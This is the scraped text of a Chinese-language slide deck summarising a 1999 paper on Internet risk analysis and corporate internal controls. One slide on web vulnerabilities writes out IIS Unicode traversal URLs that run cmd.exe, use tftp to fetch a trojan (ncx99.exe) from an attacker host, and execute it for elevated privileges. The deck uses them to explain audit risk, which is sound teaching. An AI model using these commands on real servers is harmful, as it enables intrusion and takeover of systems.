Download
1 / 52
520 likes | 623 Views
企業使用 Internet 對內部控制之影響:一個風險分析方法. 報告人 張裕幸 作者:張景翔 ‧ 陳嘉玫 電腦稽核 , Vol 5, 1999, pp.21-37. What- 公司內稽內控. 內稽 – 內部會計稽核,保護資產安全,提高會計資訊可靠性及完整性。 內控 – 內部管理控制,增進公司經營績效,促使管理政策達到目標。 內部控制過程的目的在於合理保證達成下列三個使命,分別為營運活動的有效性和效率性、財務報導的可靠性及導行相關法令規章。 內控是企業為了合理保證達成持定的目標所建立的政策和程序,這系列的政策和程序附著於企業組織結構中,與企業的營運控制密不可分。.
E N D
企業使用Internet對內部控制之影響:一個風險分析方法企業使用Internet對內部控制之影響:一個風險分析方法 報告人 張裕幸 作者:張景翔‧陳嘉玫 電腦稽核, Vol 5, 1999, pp.21-37
What-公司內稽內控 • 內稽 –內部會計稽核,保護資產安全,提高會計資訊可靠性及完整性。 • 內控 –內部管理控制,增進公司經營績效,促使管理政策達到目標。 • 內部控制過程的目的在於合理保證達成下列三個使命,分別為營運活動的有效性和效率性、財務報導的可靠性及導行相關法令規章。 • 內控是企業為了合理保證達成持定的目標所建立的政策和程序,這系列的政策和程序附著於企業組織結構中,與企業的營運控制密不可分。
Impact-網路技術應用 • 企業希望透過網路的利用,以促進績效、降低成本、依循既有標準、加快決策速度,並提供新的行銷、分配、銷售管道,創造新的產品,改善對客戶服務等。 • Internet的應用對企業而言,已不僅僅是提供通訊管道,更對企業的行銷、生產、財務、人事、資訊流通等方面產生全面性的影響。
Risk – 網路門戶開放 • IBM於1996年進行調查顯示,有七成的管理人員認為安全性及資料完整性(Integrity)是使用Internet時所必須加以考量的,而有近三成的管理人員認為Internet的使用將會使員工無法有效利用時間,並可能使生產力降低。 • Computer Security Institute (CSI)於1997年電腦犯罪及安全調查報告中指出,有近半數的管理人員認為電腦連接上Internet將會成為時常遭受攻擊的一點。 • 同份報告顯示有半數以上企業沒有警告訊息(warning alarm),有六成企業未成立電腦緊急應變小組。 • 企業內部的員工會使用Internet存取到企業內部及外部的資料,或利用上班時間上網而降低工作效率。 • 企業使用Internet若無適當控制將會形成影響企業營運的負向因子,企業會因使用Internet而遭受損失。
Inter-Control -內部控制 • 內部控制的對象都是企業內部的活動,不能超過企業個體,因此才稱為「內部控制」。內部控制的目的與Internet的使用上具有相輔相成的效果,具備健全的內部控制制度對於Internet的有效使用是十分重要的。 • 企業僅能透過內部控制制度訂定與實施,對企業的使用者進行限制或要求,並制定相關政策及程序以防範外部入侵,確保企業使用Internet提昇營運績效。
Research Purpose–研究目的 • 本文嘗試以風險分析之方法,透過系統化方式分析使用Internet的風險,並進一步整理使用Internet應建立之內部控制制度,並和以往的內部控制進行比較,以分析企業使用Internet時對內部控制制度所造成的影響。 • Contribution-研究貢獻 • 研究結果能提供管理人員在使用Internet時設計內部控制制度的參考。
風險分析 • 資產確認分析 • 威脅確認分析 • 弱點確認分析
資產確認分析 • 在此所謂資產係指組織中任何與Internet使用有關之有價物品。在此資產可分為固有價值(Intrinsic value)及後天取得價值(Acquired value)兩種。 • 資產固有價值—指該資產實體的重置成本或淨變現價值。 • 後天取得價值—該資產的完整性(Integrity)、可獲得性(Availability)、穩密性(Confidentiality)及使用性(Usage)。 • 完整性價值是指該資產的真實性(authenticity)、精確性(accurateness)及完整性(completeness)對企業有價值,企業必須確保。 • 可獲得性價值係指該資產能持續地提供服務對企業有其重要性,應加以保護。 • 隱密性價值指該資產具有其不可公開的性質。 • 使用性價值是指該資產的適當使用對企業有價值,企業應確保其被適當使用。
How-如何確認資產 • 為了確認企業使用Internet相關資產,本研究根據Bernstein等人[25]所提出之最安全防火牆架構(如圖一),結合Fites等人[35]所整理的資產,做為本研究網路開放使用的風險分析對象(如表一)。 • [25] Bernstein, T. and Bhimani, A.B. and Schultz, E. and Siegel, C.A., Internet Security of Business, John Wiley & Sons, Inc., 1996. • [35] Fites, P. and Kratz, M.P.J., Information Systems Security: a practitioner’s reference, International Thomson Computer Press, 1996.
資產確認分析 • 上述資產除了通訊(硬體)、資料、人員、軟體等四類別需要保護外,由於電子商務的進行會牽涉到資訊、產品及服務之間的買賣,為避免Internet買賣行為所產生的權利紛爭,應增加下列兩類資產:買賣相關的權利及商譽。 • 商譽係指企業使用Internet提供更好的服務,建立較佳的形象,減低成本獲得商譽。
威脅確認分析 • 根據Fites等人[35]所提出的威脅動機、種類與所影響的資產性質相對關係架構,結合Baskerville[23]、及White[51]等人所提出的架構可以擴充Fites的分類架構,加入誤用、偽造及否認三種威脅種類,並將可用性資產加入分類架構中,形成圖二之新的威脅分類架構。
威脅確認分析 • 其中「誤用」意謂著資源被使用在不適當的目地或時機,這包含員工在上班時間上網或以ICQ(or MSN)聊天,架設與工作無關的網站供外部網路任意存取等(造成佔用頻寬及提高內部資料被竊取的風險)。 • 偽造(Falsification)與篡改是不同性質的威脅來源,而一般較常見的「拒絶服務」(Denial of service)攻擊手法則是利用各種技術(通常是在一個單位時間內針對某個主機發送大量request封包),將主機原來的服務阻檔或中斷,這是屬中斷威脅,其影響為資源可獲得性。 • 由上述說明可知,Internet環境中的威脅來源和一般資訊系統或區域網路的威脅不同,其中否認(Repudiation)威脅的風險隨著電子商務的興起,影響與日俱增,為此電子商務的法律規範中,引用了數位簽章技術以確認交易雙方資訊的不可否認性。 • 由於各類資產受到的威脅來源不同,本文根據上節所進行的資產分析配合本節所進行的威脅分析,架構出表二各種資產威脅的彙整表。
三、弱點確認與分析 • Bernstein等人[25]指出系統的弱點可區分為兩種:技術性(technology)弱點及政策性(policy)弱點,而技術性弱點又可區分為:先天(Inherent)弱點及設定(configuration)弱點。
(一)先天弱點 • 所謂先天弱點係指由於通訊機制及設備、資訊的密度與價值,系統的存取性、複雜性及人員等因素所產生的弱點。 • 通訊機制架構的先天弱點:網際網路所使用的協定TCP/IP本身的特性與設計特別容易遭受駭客攻擊(譬如:Port 25是不需驗證密碼)。TCP/IP最重要的問題在於沒有能力驗證通訊個體的識別資料,且沒有保護資料隱密性的機制(以http而言,傳送帶有帳號及密碼參數的request封包非常容易擷取,而暴露資料庫的帳號及密碼,如圖3-1)。
協定弱點 • 在Internet的協定中尚有下列的四個弱點: • 低層協定(lower-layer protocols)採廣播式(broadcast)協定,使得Internet上的竊聽相當容易(eavesdrop)。 • 沒有認證(authentication)能力。 • 沒有確認封包內容(Packet contents)能力。 • 序號(sequence numbers)容易猜測。
協定弱點 • TCP/IP的協定群中的各協定亦有其弱點,如應用層之telnet、FTP、SMTP、WWW等及TCP、IP、Ethernet等均有弱點。在通訊軟體伺服器作業系統平台的設計均有其設計上的缺陷。形成容易被攻擊的弱點。而網路本身即具有實體威脅(Physical threats)、自然災害及機械上的故障。
FTP的漏洞 • 微軟IIS服務項中的FTP Server的預設功能是允許匿名連線,但這樣的狀況容易遭受駭客對FTP資料區開啓隱藏公用目錄-PUB的攻擊。受攻擊的電腦會被開啓一個沒有名稱的資料夾(通常被隱藏),而該資料夾的子項會出現一堆由亂碼為資料夾名稱,目錄徑深度通常大於3層以上,而最底層資料夾則被置放大量駭客所存放的檔案。通常受攻擊一方不自覺,直到發現磁碟空間越來越少,才驚覺磁碟空間被偷用。但困難的是,該資料夾無法刪除。此時處理方式為:先暫停IIS的FTP服務,取消允許匿名登入的設定。至於如何刪除被開啓公用目錄PUB的資料夾,可參考下列兩個網址: • 0716 - How to Remove Files with Reserved Names in Windows • Recovering from Anonymous FTP Abuse evolt.org, Backend
WWW的漏洞 • 駭客經常使用Unicode 漏洞攻擊取得Web主機的控制權,最常用的指令為http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir_c: / • 上述指令若執行成功可以瀏覽Web主機的目錄,並刪除或更改某些權限沒有嚴格限制的檔案。 • 若要取得該伺服器主機較高權限則至駭客網站下載木馬程式並於winnt/system32目錄夾下植入該木馬程式,再透過http指令執行該木馬程式即可以取得該主機的較高權限。 • 木馬程式上傳:http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp –i 192.192.100.1 GET ncx99.exe c: • 【Note】202.100.100.1為被攻擊主機,192.192.100.1為攻擊主機。 • 上述指令要成功必須(1)被攻擊主機202.100.100.1目錄 c:\inetpub\scripts\存在;(2)該win2000 server主機未安裝防止unicode攻擊之修正程式(補丁程式)。 • 若上述指令執行成功,則再執行 • http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ c: \inetpub\scripts\ncx99.exe • 將目錄切換至c:\inetpub\scripts\ncx99.exe則可以成功取得最高權限。
電子商務弱點 • 企業在使用Internet作為交易媒介,與客戶、供應商作線上交易、資料交換或是銀行轉帳時,無可避免地會有遭受攻擊的風險。因此電子商務本身具有三大弱點: • 使用電子商務的風險將不僅須考慮系統本身的安全,其安全性亦受到供應商及客戶的影響。 • 交易本身是安全的,然而原始動機不見得是安全的。這意味著光是保護通訊過程,仍不足以保證不會發生損失。 • 網路上的權利義務並不對等。 • 由以上的分析,可對使用Internet的先天弱點做一分類,如圖三所示:
(二)設定弱點 • 所謂設定弱點係指作業系統及複雜的軟體系統沒有經過適當的設定所發生的弱點(未更新作業系統的修正程式、未正確設定主機安全性原則)。常見的系統設定弱點包含下列四點: • 不安全的使用者帳號(如guest帳號過期或隸屬群組權限過大)。 • 沒有更改廣為人知之預設密碼的系統帳號(例如Administrator的密碼是enter或空白,選用到「脆弱密碼-weak key」)。 • 各項Internet服務的設定錯誤(misconfigured),如:開放檔案匿名存取。 • 各項產品不安全的預設值。
(三)政策弱點 • 所謂政策弱點是由於企業沒有具備適當的安全措施及程序所造成的弱點。 • 政策是否有弱點可以從安全政策及程序是否適當有效制定及有效執行予以評估。 • 常見的政策弱點如備份程序不適當、輸出入程序不安全、缺乏安全控制的管理支援、軟硬體維護不當及未建立緊急應變編組及電腦危機處理程序等。這些都是安全政策及程序沒有適當有效策定所造成。 • 綜合前三項所進行的分析可以整理各類資產所可能具有的各種弱點,如表三。 • 由於各類資產所面臨的威脅不同,各類資產所具有的弱點也不同,此二者配合起來,將是制定各類資產保護措施的重要依據。
參、使用Internet之內部控制 • 各類資產之相關內部控制 • 為了解每一類資產之所面臨之威脅及存在的弱點間的關係,依據威脅及弱點訂定適當的內部控制措施,本文加以整合探討進行分析。
通訊類別 • 通訊線路及網路卡(如表四)可採用之內部控制措施: • 一般控制:與廠商訂定維護合約,定期維護。 • 實體控制:定期檢測線路,保持線路之順暢。 • 硬體變動管理:實體或硬體使用地點變更須核准。 • 設定管理:管線連接路徑圖、網路卡驅動程式建檔管理,線路檢測作業程序等操作文件之製作及維護。
通訊類別 • 防火牆(如表五)可採用之內部控制措施: • 一般控制:與廠商訂定維護合約、管理人員之技術訓練、訂定操作管理規範、產品及服務項目評估。 • 實體控制:定期檢測設備,防範設備遭受破壞及不當人員操作。 • 硬體變動管理:實體或硬體使用地點變更須核准。 • 設定管理:訂定操作標準作業程序、定期檢視稽核日誌Logfile,定期檢視安全政策設定是否周嚴。
資料類別 • 資料庫、稽核日誌檔、各主機之區域資料(如表六) 、執行中的資料(如表七)可採用之內部控制措施: • 一般控制:各使用帳號之資料存取動作均記錄於稽核日誌檔中、管理人員須定期檢視稽核日誌檔、稽核日誌檔異常事件之處理程序與危機風險指標、定期掃毒等。 • 實體控制:定期檢測資料庫及硬碟使用狀態,防範資料(庫)遭受破壞及不當人員存取。 • 設定管理:訂定資料庫異常回復操作標準作業程序、主機檔案資料、資料庫及稽核日誌檔定期備份,建立資料庫管理系統及平台之設定標準作業程序。 • 存取控制:各帳號資料存取的容量規劃與管制、不同帳號之存取權限設定。
資料類別 • 3.資料的備份(如表八) 可採用之內部控制措施: • 一般控制:訂定備份操作程序、訂定資料調用標準與審核程序、訂定備份周期、定期備份等。 • 實體控制:備份實體之儲放環境,防範遭受破壞及不當人員存取。
資料類別 • 4.媒介中正在傳輸的資料(如表九) 可採用之內部控制措施: • 一般控制:關閉不必要的協定與服務、傳輸內容嵌入加解密機制、建立安全的通訊管道(secure channel)等。 • 實體控制:監看網路流量是否異常、防範駭客啓動網路分析軟體、啓動安全性掃瞄軟體。
人員類別 • (三)人員(如表十) 可採用之內部控制措施: • 一般控制:訂定明確的使用及管理規範、強化人員忠誠度、落實職務等級及存取權限的控管。 • 實體控制:利用防火牆QoS機制設定開放上網瀏覽時段及流量分配,稽核各人員帳號之存取事件。
(四)軟體類別 • 軟體(如表十一) 可採用之內部控制措施: • 一般控制:軟體版本控制及更新、軟體合法使用授權、建立軟體安裝、使用之標準操作程序、軟體正確使用之教育訓練,軟體安裝序號管理。 • 實體控制:軟體使用權限設定,軟體實體儲放與軟體下載管理,確保軟體安裝之平台及環境之正常運作。
(四)軟體類別 • 2.通訊軟體(如表十二) 可採用之內部控制措施: • 一般控制:教育系統人員正確使用、依據作業需求設定通訊連線之安全性、機密性或敏感性資料傳輸採安全傳輸通道傳送。 • 存取控制:軟體使用權限設定,訂定和外界實體存取連線的安全政策,確保通訊軟體安裝之平台及環境之正常運作,稽核日誌檔設計及定期檢視。 • 設定控制:訂定通訊軟體的標準設定及操作程序。
(五)其他類別 • 1.買賣相關的權利(如表十三) 可採用之內部控制措施: • 一般控制:買賣契約訂定、安全性資料交換協定的建立、線上付款系統的評估、導入安全性解決方案。
(五)其他類別 • 2.商譽(如表十四) 可採用之內部控制措施: • 一般控制:緊急應變計畫之訂定、建立顧客理賠制度及評估標準、系統危安事件資料及記錄蒐集、聘任系統安全顧問。
完整的Internet內部控制制度 • 上述所訂定的安全控制策略屬於技術面的控制策略。企業的安全策略範圍十分廣泛除技術面外,應涵蓋組織面及政策面的考量。 • 根據COSO報告[30],良好的內部控制要素為:控制環境、風險評估、控制活動、資訊與溝通、監督等五項。 • [30] Committee of Sponsoring Organizations of Treadway Commission, Internal Controls – Integrated Framework, Coopers and Lybrand, Vol. 1-4, Sep.1992.
控制環境(Environment control) • 環境是主要影響控制政策和程序執行效益的因素。它本身營造組織風氣與文化進而影響員工對內部控制的認知,控制環境是其他控制要素的基礎。環境要素包含下列:成員的道德操守、管理哲學和經營型態、組織結構、職權和職責的指派、人力資源經營與訓練。
風險評估(Risk Assessment) • 企業應對現在與潛在的風險進行評估,而評估的活動主要在識別和分析目前公司營運存在的風險以作為管理風險之依據。風險評估包含確定風險存在的可能機率、對企業營運的衝擊範圍、影響時間長久及尋求排除或降低損失的解決方案,建立預制度及危機處理小組。
控制活動(Control Activities) • 控制活動是指落實管理層級所下達的指令能夠確實執行所進行的程序,包括:授權(任務指派)、執行、記錄、保管及稽核。
資訊與溝通(Information and Communication) • 資訊在企業的角色不僅可以加速其營運績效,亦可作為稽核績效的依據。而企業資訊流的加速傳遞必須有實體層次及應用層次的溝通管道(傳播通道)。 • 【Note】企業知識管理系統亦建立於組織的通訊線路的基礎建設及應用層次的資訊整合分享應用。
監控(Monitoring) • 企業內部控制是否執行得當及如何提出適時修正,均需設計良好的監控制度。安全人員(MIS人員)必須遵照規定定期檢視系統稽核日誌檔。企業成員亦須做到防範系統危安事件的發生,有效規避不當的資料存取,電腦病毒發作的即時阻絶及通報均應視為自身的職責。
完整的Internet內部控制制度 • 技術面係針對各種資產及所面臨的威脅、弱點所進行實際的控制;而非技術面的控制係從企業整體環境上予以控制,以塑造有利的控制環境,做為技術面控制措施的基礎。
肆、各種電腦化環境下的內部控制 • 電子資料處理(EDP) • 電子資料交換(EDI)
電子資料處理(Electronic Data Processing;EDP) • 電子資料處理(Electronic Data Processing;EDP)系統的內部控制:完整EDP內部控制架構必須包含許層面,根據美國會計認證協會所提出的EDP內部控制架構(如圖四),EDP系統的內部控制可區分成為一般控制程序(General control procedures)及應用控制程序(Application control procedures)。 • 完整的EDP系統的內部控制制度必須涵蓋相當廣泛的層面,如此方能達到內部控制的各項目的,確保企業營運績效,資訊表達的正確性及達成相關的法律責任。
電子資料交換(EDI) • 電子資料交換(EDI)的內部控制 • 電子資料交換係指交易夥伴透過電腦的加值型專線傳送具標準格式的電子文件。目前EDI兩大標準(ANSI及UN/EDIFACT)都提供了資料傳輸完整性控制,如確認(Acknowledgements),批次總數(Batch totals),檔案序號(File sequence numbers)。 • 除了上述EDI本身提供的控制機制,EDI所面對的風險及可採取的內部控制可整理如表十五所示:
電子資料交換(EDI) • Marcella等人[42]則進一步指出EDI存在下列風險: • 交互影響的弱點(Cross-vulnerability):連線單位的系統安全會相互影響,加密機制、設定資料擁有權、跨組織安全診斷、金鑰的保存政策等均為上述弱點的解決方案。 • 第三者網路風險(Third-party network risks) :這類風險包含資料的穩密性遭受揭露,傳輸錯誤或第三者(third-party)所造成的無效或未授權交易。 • 整合性風險(Risks of Integration) :當EDI和企業原有系統整合時,由於錯誤、疏忽及故障所造成的骨牌效應,將作倍數成長。解決方案為系統的安全控制、環境控制及系統的專案控制等,而應用控制則包含輸入、處理和輸出及EDI介面控制等。 • 稽核性風險(Auditability risks):由於電子性記錄十分容易遭受偽造及更改,因此透過稽核技術可以檢查記錄在傳送的過程是否遭受更改,企業使用EDI將迫使稽核人員改變其稽核方式,保有電子性記錄是稽核EDI系統中不可或缺的重要考量。
